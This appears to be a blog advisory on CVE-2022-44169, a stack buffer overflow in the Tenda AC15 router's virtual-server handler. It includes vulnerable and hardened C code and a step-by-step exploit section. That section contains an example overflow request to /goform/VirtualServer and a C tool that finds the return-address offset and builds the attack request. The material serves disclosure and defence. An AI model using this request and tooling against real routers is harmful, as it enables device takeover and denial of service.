The Tenda AC15 is a popular wireless router model found in many homes and small offices. However, users should be aware of a serious vulnerability disclosed as CVE-2022-44169. This vulnerability affects Tenda AC15 firmware version V15.03.05.18 and stems from a buffer overflow in the function handling virtual server settings: formSetVirtualSer. This post will walk you through the technical details, exploitation process, and ways to secure your device.

What is a Buffer Overflow?

A buffer overflow happens when a program writes more data into a block of memory, or buffer, than the buffer was sized to hold. The excess spills into whatever sits next to it. When the buffer lives on the stack, as it does here, the neighbours are the function's saved registers and its saved return address, so an attacker who controls the overflowing bytes can decide where execution goes when the function returns. On a router that usually means a crash of the web server at minimum, and hijacking of the device if the overwrite is precise.

Where is the Bug?

The Tenda AC15 firmware has a formSetVirtualSer function. It handles the request sent when a user configures the virtual server (port forwarding) feature through the router's web interface. The length of the user-supplied input is not checked, in particular for the vritual_server parameter, so an attacker can submit an oversized value and overwrite the stack beyond the destination buffer.

Original References

- CVE Source
- Exploit Database Reference
- Github POC Sample
- Firmware Download (for testing)

A snippet of reverse-engineered C code (simplified for clarity) from the Tenda AC15 firmware:

#include <string.h>

void formSetVirtualSer(char *vritual_server) {
    char buffer[256];                 // fixed-size stack buffer
    // User input copied without length verification:
    // strcpy() stops at the source's terminating NUL, never at the end of buffer
    strcpy(buffer, vritual_server);   // <-- No length check!
    // ... routine handling
}

This function copies the user-supplied vritual_server parameter directly into a fixed-size 256-byte buffer. At most 255 characters fit alongside the terminating NUL that strcpy writes; anything longer runs past the end of buffer into the rest of the stack frame, and a long enough value reaches the saved return address, which is what makes code execution possible.
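The block below is an added example, not code from the page or from Tenda's firmware. It puts the page's simplified vulnerable handler beside a hardened form and shows where the bound has to be enforced when the value arrives in a form-encoded request body. The vritual_server name and the 256-byte buffer come from the snippet above; form_value, process_virtual_server_body, make_body, the sample value and the body sizes are constructed here for the demonstration.

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#define VS_BUF_LEN 256              /* same fixed size as the page's snippet */

/* The page's simplified vulnerable handler, kept only for contrast.
 * strcpy() stops at the NUL of the source, never at the end of buffer,
 * so a value of 256 or more characters overruns the stack frame. */
size_t formSetVirtualSer_vulnerable(const char *vritual_server)
{
    char buffer[VS_BUF_LEN];
    strcpy(buffer, vritual_server);         /* no bound: never call with untrusted input */
    return strlen(buffer);
}

/* Hardened form (added here, not Tenda's fix): refuse a value that does not
 * fit together with its terminator instead of truncating silently, since a
 * silently truncated port-forwarding rule is itself a bug. */
int formSetVirtualSer_hardened(const char *vritual_server, char *out, size_t out_len)
{
    size_t n = 0;
    while (n < out_len && vritual_server[n] != '\0')   /* bounded length scan */
        n++;
    if (n >= out_len)
        return -1;                          /* oversized: reject the request */
    memcpy(out, vritual_server, n + 1);     /* n bytes plus the NUL */
    return (int)n;
}

/* Minimal extractor for one parameter of an application/x-www-form-urlencoded
 * body; returns a malloc'd copy (caller frees) or NULL if absent. Constructed
 * helper: percent-decoding is omitted, and a real parser must decode first and
 * then bound-check the decoded value. */
char *form_value(const char *body, const char *name)
{
    size_t nlen = strlen(name);
    for (const char *p = body; p != NULL && *p != '\0'; ) {
        if (strncmp(p, name, nlen) == 0 && p[nlen] == '=') {
            const char *v = p + nlen + 1;
            const char *e = strchr(v, '&');
            size_t vlen = e ? (size_t)(e - v) : strlen(v);
            char *copy = malloc(vlen + 1);
            if (copy == NULL)
                return NULL;
            memcpy(copy, v, vlen);
            copy[vlen] = '\0';
            return copy;
        }
        p = strchr(p, '&');                 /* skip to the next pair */
        if (p != NULL)
            p++;
    }
    return NULL;
}

/* Stored setting, written only by the hardened path. */
char virtual_server_setting[VS_BUF_LEN];

/* Request-level handler: 0 on success, -1 if the parameter is missing,
 * -2 if it is too long for the buffer. */
int process_virtual_server_body(const char *body)
{
    char *v = form_value(body, "vritual_server");
    if (v == NULL)
        return -1;
    int rc = formSetVirtualSer_hardened(v, virtual_server_setting,
                                        sizeof virtual_server_setting);
    free(v);
    return rc < 0 ? -2 : 0;
}

/* Constructed request body with n filler bytes, shaped like the page's example. */
char *make_body(size_t n)
{
    const char prefix[] = "vritual_server=";
    char *body = malloc(sizeof prefix + n);      /* sizeof prefix includes the NUL */
    if (body == NULL)
        return NULL;
    memcpy(body, prefix, sizeof prefix - 1);
    memset(body + sizeof prefix - 1, 'A', n);
    body[sizeof prefix - 1 + n] = '\0';
    return body;
}

int main(void)
{
    char *ok = make_body(255), *bad = make_body(300);
    printf("255-byte value: rc=%d\n", process_virtual_server_body(ok));   /* 0 */
    printf("300-byte value: rc=%d\n", process_virtual_server_body(bad));  /* -2 */
    free(ok);
    free(bad);
    return 0;
}
```

The important choice is rejecting rather than truncating: strncpy or a bare snprintf would stop the overflow but could store a mangled rule, and a rejected request is also a much easier event to log and alert on than a quietly shortened one.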

Step-by-Step Exploit

1. Attacker prerequisites: The attacker must be able to reach the router's admin web interface (often port 80 on the LAN, or the port chosen for remote management if that is enabled).
2. Crafting the HTTP request: The attacker sends a POST request to the router administration endpoint (like /goform/VirtualServer) with the vritual_server parameter set to a value longer than the 256-byte buffer.
3. Payload: The bytes past the end of the buffer overwrite the saved registers and the saved return address of the handler. Controlling the return address is what turns the overflow into remote code execution (RCE), for example by returning into an attacker-chosen address or into injected shellcode.

Example malicious request

POST /goform/VirtualServer HTTP/1.1
Host: 192.168..1
Content-Type: application/x-www-form-urlencoded
Content-Length: 300

vritual_server=AAAAAAAAAAAAAAAA......<over 256 A's>......BBBB

In this example, 256 or more bytes of A (\x41) overflow the buffer, and the trailing BBBB stands for the four bytes that would be tailored to overwrite the saved return address. Their exact position is not necessarily right after byte 256: the distance from the start of buffer to the saved return address depends on the compiled frame layout (saved registers sit between the two), so it has to be measured on the target rather than assumed.
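Two details the request above glosses over are that Content-Length must match the body that is actually sent, and that the offset of the return address is measured, not assumed. The block below is an added example, not from the page or from any published PoC: pattern_create and pattern_offset are a Metasploit-style cyclic pattern generator and lookup written here (send the pattern as the value, read the faulting PC or LR from the crash, and map it back to an offset), build_request reuses the page's endpoint and parameter name, and ROUTER_IP and the crash value in main are placeholders.

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <stdint.h>

/* Metasploit-style cyclic pattern "Aa0Aa1Aa2...": every 4-byte window is
 * unique within the full 20280-byte sequence, so the bytes found in the
 * faulting register identify their offset. out must hold n + 1 bytes.
 * Returns the number of bytes written. */
size_t pattern_create(char *out, size_t n)
{
    size_t pos = 0;
    for (char a = 'A'; a <= 'Z' && pos < n; a++)
        for (char b = 'a'; b <= 'z' && pos < n; b++)
            for (char c = '0'; c <= '9' && pos < n; c++) {
                const char triple[3] = { a, b, c };
                for (int i = 0; i < 3 && pos < n; i++)
                    out[pos++] = triple[i];
            }
    out[pos] = '\0';
    return pos;
}

/* Offset of the 4 pattern bytes that landed in a 32-bit register on a
 * little-endian target (the AC15 runs a little-endian ARM SoC); -1 if absent. */
long pattern_offset(const char *pattern, size_t n, uint32_t reg_value)
{
    unsigned char needle[4];
    for (int i = 0; i < 4; i++)
        needle[i] = (unsigned char)(reg_value >> (8 * i));   /* little-endian bytes */
    for (size_t i = 0; i + 4 <= n; i++)
        if (memcmp(pattern + i, needle, 4) == 0)
            return (long)i;
    return -1;
}

/* Build the page's request with a Content-Length computed from the real body.
 * Returns a malloc'd string (caller frees). The Host value is a placeholder. */
char *build_request(const char *host, const char *value)
{
    const char param[] = "vritual_server=";
    size_t body_len = sizeof param - 1 + strlen(value);
    size_t cap = body_len + strlen(host) + 160;     /* headers are under 160 bytes */
    char *req = malloc(cap);
    if (req == NULL)
        return NULL;
    snprintf(req, cap,
             "POST /goform/VirtualServer HTTP/1.1\r\n"
             "Host: %s\r\n"
             "Content-Type: application/x-www-form-urlencoded\r\n"
             "Content-Length: %zu\r\n"
             "\r\n"
             "%s%s", host, body_len, param, value);
    return req;
}

/* Length of the body after the blank line, to check against Content-Length. */
size_t request_body_len(const char *req)
{
    const char *sep = strstr(req, "\r\n\r\n");
    return sep ? strlen(sep + 4) : 0;
}

/* Fixed 300-byte pattern shared by main and any checks. */
char demo_pattern[301];
size_t demo_pattern_len(void) { return pattern_create(demo_pattern, 300); }

int main(void)
{
    demo_pattern_len();
    char *req = build_request("ROUTER_IP", demo_pattern);
    printf("%s\n", req);
    /* Placeholder: if the crash showed PC = 0x6a413969, the offset is 268. */
    printf("offset: %ld\n", pattern_offset(demo_pattern, 300, 0x6a413969u));
    free(req);
    return 0;
}
```

Once the offset is known, the filler is that many bytes and the four bytes after it become the return address; on ARM the value read from LR or PC at the crash is what pattern_offset expects.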

Impact

- Router crash (denial of service): an imprecise overwrite corrupts the stack and crashes the process serving the web interface, taking administration of the router offline until it restarts.
- Remote Code Execution: if the attacker overwrites the saved return address with a carefully crafted payload, it may be possible to execute arbitrary code, giving the attacker control of the router.

Mitigation

- Update Firmware: ALWAYS keep your router's firmware updated. Check Tenda support for a release newer than V15.03.05.18 and confirm it addresses this CVE.
- Disable Remote Management: Make sure the web interface is not reachable from the internet (WAN). Remember that the bug is still reachable from the LAN, so anyone on the local network, or a site running malicious JavaScript in a browser on it, can still reach the admin interface.

Conclusion

CVE-2022-44169 in Tenda AC15 V15.03.05.18 is a classic, severe buffer overflow vulnerability in the virtual server settings handler (formSetVirtualSer). Anyone with network access to the router’s admin interface (local or remote) can crash or compromise the router.

If you’re using a Tenda AC15 — update your firmware now and check your settings!

Stay safe and secure your routers!

*This guide is for educational purposes and ethical research only. Do not exploit devices without permission.*



Timeline

Published on: 11/21/2022 15:15:00 UTC
Last modified on: 11/21/2022 20:30:00 UTC